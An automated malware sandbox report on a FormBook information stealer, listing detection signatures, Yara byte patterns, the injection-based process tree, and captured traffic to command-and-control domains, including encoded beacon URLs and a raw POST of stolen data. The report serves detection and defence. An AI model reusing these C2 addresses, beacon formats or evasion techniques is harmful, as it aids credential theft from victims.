Windows Analysis Report
031215-Revised-01.exe

Overview

General Information

Sample name: 031215-Revised-01.exe
Analysis ID: 1499198
MD5: 1bf161b2bc2c8efddf6fbc402dfb9508
SHA1: 0525fb1f6e537a26faf3438b1d5d9e118e3a9a52
SHA256: 99e143144585b210119ead96a354e3425f4b84a58a7554de9e89aa3a9154c21f
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious RASdial Activity
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 031215-Revised-01.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\031215-Revised-01.exe" MD5: 1BF161B2BC2C8EFDDF6FBC402DFB9508)
    • svchost.exe (PID: 7624 cmdline: "C:\Users\user\Desktop\031215-Revised-01.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • EsAzcOtjoknfjP.exe (PID: 3120 cmdline: "C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasdial.exe (PID: 7964 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • EsAzcOtjoknfjP.exe (PID: 5356 cmdline: "C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8144 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source: 00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
  • 0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x140bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
  • 0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x140bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000008.00000002.3521236665.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 1.2.svchost.exe.2680000.0.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 1.2.svchost.exe.2680000.0.unpack, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
  • 0x2e053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x163d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 1.2.svchost.exe.2680000.0.raw.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 1.2.svchost.exe.2680000.0.raw.unpack, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
  • 0x2ee53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x171d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started, Author: juju4, Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe" , ParentImage: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe, ParentProcessId: 3120, ParentProcessName: EsAzcOtjoknfjP.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 7964, ProcessName: rasdial.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\031215-Revised-01.exe", CommandLine: "C:\Users\user\Desktop\031215-Revised-01.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\031215-Revised-01.exe", ParentImage: C:\Users\user\Desktop\031215-Revised-01.exe, ParentProcessId: 7568, ParentProcessName: 031215-Revised-01.exe, ProcessCommandLine: "C:\Users\user\Desktop\031215-Revised-01.exe", ProcessId: 7624, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\031215-Revised-01.exe", CommandLine: "C:\Users\user\Desktop\031215-Revised-01.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\031215-Revised-01.exe", ParentImage: C:\Users\user\Desktop\031215-Revised-01.exe, ParentProcessId: 7568, ParentProcessName: 031215-Revised-01.exe, ProcessCommandLine: "C:\Users\user\Desktop\031215-Revised-01.exe", ProcessId: 7624, ProcessName: svchost.exe
No Suricata rule has matched

AV Detection

Source: http://www.weep.site/v1m8/?3L9l=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&kZr0=ht-lElyh, Avira URL Cloud: Label: malware
Source: 031215-Revised-01.exe, ReversingLabs: Detection: 36%
Source: Yara match, File source: 1.2.svchost.exe.2680000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.svchost.exe.2680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.3521236665.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.3519634972.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.3518320183.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.2081915749.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.3519666163.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.2082567051.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: 031215-Revised-01.exe, Joe Sandbox ML: detected
            Source: 031215-Revised-01.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EsAzcOtjoknfjP.exe, 00000005.00000000.2005677957.0000000000E6E000.00000002.00000001.01000000.00000005.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3518322443.0000000000E6E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: 031215-Revised-01.exe, 00000000.00000003.1722823360.0000000003C90000.00000004.00001000.00020000.00000000.sdmp, 031215-Revised-01.exe, 00000000.00000003.1722915545.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082183945.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082183945.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1988264007.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1990149882.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3519880403.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3519880403.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2084604112.0000000004AF7000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2082199541.000000000494A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000001.00000003.2048949385.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082015604.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000002.3519140397.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000003.2022839574.00000000011CB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 031215-Revised-01.exe, 00000000.00000003.1722823360.0000000003C90000.00000004.00001000.00020000.00000000.sdmp, 031215-Revised-01.exe, 00000000.00000003.1722915545.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2082183945.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082183945.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1988264007.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1990149882.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000002.3519880403.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3519880403.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2084604112.0000000004AF7000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2082199541.000000000494A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000001.00000003.2048949385.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082015604.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000002.3519140397.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000003.2022839574.00000000011CB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rasdial.exe, 00000006.00000002.3520253093.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3518674647.0000000003059000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000000.2155169663.000000000348C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2373155409.000000000A95C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000006.00000002.3520253093.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3518674647.0000000003059000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000000.2155169663.000000000348C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2373155409.000000000A95C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\031215-Revised-01.exe, Code function: 0_2_000DDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_000DDBBE
Source: C:\Users\user\Desktop\031215-Revised-01.exe, Code function: 0_2_000E68EE FindFirstFileW,FindClose, 0_2_000E68EE
Source: C:\Users\user\Desktop\031215-Revised-01.exe, Code function: 0_2_000E698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_000E698F
Source: C:\Users\user\Desktop\031215-Revised-01.exe, Code function: 0_2_000DD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_000DD076
Source: C:\Users\user\Desktop\031215-Revised-01.exe, Code function: 0_2_000DD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_000DD3A9
Source: C:\Users\user\Desktop\031215-Revised-01.exe, Code function: 0_2_000E9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_000E9642
Source: C:\Users\user\Desktop\031215-Revised-01.exe, Code function: 0_2_000E979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_000E979D
Source: C:\Users\user\Desktop\031215-Revised-01.exe, Code function: 0_2_000E9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_000E9B2B
Source: C:\Users\user\Desktop\031215-Revised-01.exe, Code function: 0_2_000E5C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_000E5C97
Source: C:\Windows\SysWOW64\rasdial.exe, Code function: 6_2_02BCC420 FindFirstFileW,FindNextFileW,FindClose, 6_2_02BCC420
Source: C:\Windows\SysWOW64\rasdial.exe, Code function: 4x nop then xor eax, eax, 6_2_02BB9B60
Source: C:\Windows\SysWOW64\rasdial.exe, Code function: 4x nop then pop edi, 6_2_02BBE109
Source: C:\Windows\SysWOW64\rasdial.exe, Code function: 4x nop then mov ebx, 00000004h, 6_2_04B804DF

Networking

Source: DNS query: www.jaxo.xyz
Source: Joe Sandbox View, IP Address: 167.172.133.32
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 10 times)
Source: C:\Users\user\Desktop\031215-Revised-01.exe, Code function: 0_2_000ECE44 InternetReadFile,SetEvent,GetLastError,SetEvent, 0_2_000ECE44
Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK, date: Mon, 26 Aug 2024 16:28:59 GMT, server: Apache, set-cookie: __tad=1724689739.4296456; expires=Thu, 24-Aug-2034 16:28:59 GMT; Max-Age=315360000, vary: Accept-Encoding, content-encoding: gzip, content-length: 577, content-type: text/html; charset=UTF-8, connection: close
Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK, date: Mon, 26 Aug 2024 16:29:01 GMT, server: Apache, set-cookie: __tad=1724689741.3310780; expires=Thu, 24-Aug-2034 16:29:01 GMT; Max-Age=315360000, vary: Accept-Encoding, content-encoding: gzip, content-length: 577, content-type: text/html; charset=UTF-8, connection: close
Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK, date: Mon, 26 Aug 2024 16:29:04 GMT, server: Apache, set-cookie: __tad=1724689744.5631408; expires=Thu, 24-Aug-2034 16:29:04 GMT; Max-Age=315360000, vary: Accept-Encoding, content-encoding: gzip, content-length: 577, content-type: text/html; charset=UTF-8, connection: close
Source: global traffic, HTTP traffic detected: GET /v1m8/?3L9l=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&kZr0=ht-lElyh HTTP/1.1, Host: www.weep.site, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Accept-Language: en-US,en;q=0.5, Connection: close, User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /l4rw/?3L9l=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&kZr0=ht-lElyh HTTP/1.1, Host: www.88nn.pro, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Accept-Language: en-US,en;q=0.5, Connection: close, User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /t3gh/?3L9l=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&kZr0=ht-lElyh HTTP/1.1, Host: www.fontanerourgente.net, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Accept-Language: en-US,en;q=0.5, Connection: close, User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /zctj/?3L9l=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&kZr0=ht-lElyh HTTP/1.1, Host: www.onlytradez.club, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Accept-Language: en-US,en;q=0.5, Connection: close, User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /kyiu/?kZr0=ht-lElyh&3L9l=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k= HTTP/1.1, Host: www.32wxd.top, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Accept-Language: en-US,en;q=0.5, Connection: close, User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /f9bc/?3L9l=6SLGUfBvDKizOJgh7zQ0wdcCvGBSm89i7oEe4x7u5mEB7F/p7TzH3kWVQQZ5nrAfRyQgCx35fGtmx6dEsYxPA9ia3C50a/z/OeG1bPlxFxHVM2abTu6B/y8=&kZr0=ht-lElyh HTTP/1.1, Host: www.jaxo.xyz, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Accept-Language: en-US,en;q=0.5, Connection: close, User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /647x/?3L9l=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&kZr0=ht-lElyh HTTP/1.1, Host: www.xforum.tech, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Accept-Language: en-US,en;q=0.5, Connection: close, User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /l90v/?3L9l=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&kZr0=ht-lElyh HTTP/1.1, Host: www.cannulafactory.top, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Accept-Language: en-US,en;q=0.5, Connection: close, User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /rgqx/?3L9l=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&kZr0=ht-lElyh HTTP/1.1, Host: www.ayypromo.shop, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Accept-Language: en-US,en;q=0.5, Connection: close, User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp, String found in binary or memory: <li id="menu-item-19" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-19"><a href="https://www.facebook.com/wordpress"><svg class="svg-icon" width="24" height="24" aria-hidden="true" role="img" focusable="false" width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M12 2C6.5 2 2 6.5 2 12c0 5 3.7 9.1 8.4 9.9v-7H7.9V12h2.5V9.8c0-2.5 1.5-3.9 3.8-3.9 1.1 0 2.2.2 2.2.2v2.5h-1.3c-1.2 0-1.6.8-1.6 1.6V12h2.8l-.4 2.9h-2.3v7C18.3 21.1 22 17 22 12c0-5.5-4.5-10-10-10z"></path></svg><span class="screen-reader-text">Facebook</a></li> equals www.facebook.com (Facebook)
Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp, String found in binary or memory: <li id="menu-item-20" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20"><a href="https://twitter.com/wordpress"><svg class="svg-icon" width="24" height="24" aria-hidden="true" role="img" focusable="false" width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M22.23,5.924c-0.736,0.326-1.527,0.547-2.357,0.646c0.847-0.508,1.498-1.312,1.804-2.27 c-0.793,0.47-1.671,0.812-2.606,0.996C18.324,4.498,17.257,4,16.077,4c-2.266,0-4.103,1.837-4.103,4.103 c0,0.322,0.036,0.635,0.106,0.935C8.67,8.867,5.647,7.234,3.623,4.751C3.27,5.357,3.067,6.062,3.067,6.814 c0,1.424,0.724,2.679,1.825,3.415c-0.673-0.021-1.305-0.206-1.859-0.513c0,0.017,0,0.034,0,0.052c0,1.988,1.414,3.647,3.292,4.023 c-0.344,0.094-0.707,0.144-1.081,0.144c-0.264,0-0.521-0.026-0.772-0.074c0.522,1.63,2.038,2.816,3.833,2.85 c-1.404,1.1-3.174,1.756-5.096,1.756c-0.331,0-0.658-0.019-0.979-0.057c1.816,1.164,3.973,1 equals www.twitter.com (Twitter)
            Source: global trafficDNS traffic detected: DNS query: www.weep.site
            Source: global trafficDNS traffic detected: DNS query: www.88nn.pro
            Source: global trafficDNS traffic detected: DNS query: www.fontanerourgente.net
            Source: global trafficDNS traffic detected: DNS query: www.onlytradez.club
            Source: global trafficDNS traffic detected: DNS query: www.32wxd.top
            Source: global trafficDNS traffic detected: DNS query: www.jaxo.xyz
            Source: global trafficDNS traffic detected: DNS query: www.xforum.tech
            Source: global trafficDNS traffic detected: DNS query: www.cannulafactory.top
            Source: global trafficDNS traffic detected: DNS query: www.taapbit.online
            Source: global trafficDNS traffic detected: DNS query: www.ayypromo.shop
            Source: unknownHTTP traffic detected: POST /l4rw/ HTTP/1.1Host: www.88nn.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.88nn.proReferer: http://www.88nn.pro/l4rw/Cache-Control: max-age=0Connection: closeContent-Length: 201Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36Data Raw: 33 4c 39 6c 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 58 6c 74 31 64 50 34 4e 31 76 6e 2b 34 50 68 78 51 46 55 51 31 78 6e 73 58 47 30 59 2b 2b 4a 68 70 42 2b 50 31 4b 4e 47 55 62 71 33 70 56 37 65 72 4e 69 36 68 30 71 4c 74 2b 4f 6b 48 38 33 55 45 6b 30 48 34 38 57 45 30 2b 6b 52 51 53 34 52 56 6e 4e 43 67 36 53 74 36 6f 49 45 4e 32 52 57 4a 5a 52 5a 54 4e 49 7a 38 6e 5a 41 62 4a 63 77 38 59 78 59 51 41 64 70 42 6a 2b 4e 4c 52 42 61 41 43 4e 46 34 75 34 78 43 30 70 4b 70 72 72 78 2f 79 61 58 6b 78 2b 74 49 69 4a 6f 4d 35 73 50 69 44 6b 76 54 46 30 41 36 76 46 72 4f 38 57 78 32 34 43 70 48 77 3d 3d Data Ascii: 3L9l=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4xC0pKprrx/yaXkx+tIiJoM5sPiDkvTF0A6vFrO8Wx24CpHw==
